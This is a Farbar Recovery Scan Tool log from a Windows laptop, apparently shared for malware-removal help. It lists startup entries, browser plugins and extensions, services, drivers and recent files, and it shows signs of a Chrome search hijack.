Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-03-22]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-09]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-07]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 a2AntiMalware; C:\Program Files\Emsisoft Anti-Malware\a2service.exe [11334288 2016-04-08] (Emsisoft Ltd)
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
R1 epp; C:\PROGRAM FILES\EMSISOFT ANTI-MALWARE\epp.sys [124080 2016-02-11] (Emsisoft Ltd)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
S3 MFE_RR; C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [24120 2016-04-07] (McAfee, Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-09 16:22 - 2016-04-09 16:22 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-09 10:36 - 2016-04-09 10:36 - 00002547 _____ C:\Users\Public\Desktop\TurboTax 2015.lnk
2016-04-09 10:36 - 2016-04-09 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2015
2016-04-09 01:20 - 2016-04-09 01:22 - 00000000 ____D C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko)
2016-04-09 00:24 - 2016-04-09 00:31 - 39492246 _____ C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko).zip
2016-04-09 00:02 - 2016-04-09 00:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Weezer - Weezer (White Album)
2016-04-09 00:02 - 2016-04-09 00:12 - 00000000 ____D C:\Users\RoNiN\Downloads\A Tribe Called Quest - The Best Of
2016-04-08 23:28 - 2016-04-08 23:28 - 03119168 _____ C:\Users\RoNiN\Downloads\AdwCleaner.exe
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-09 16:28 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-09 16:19 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
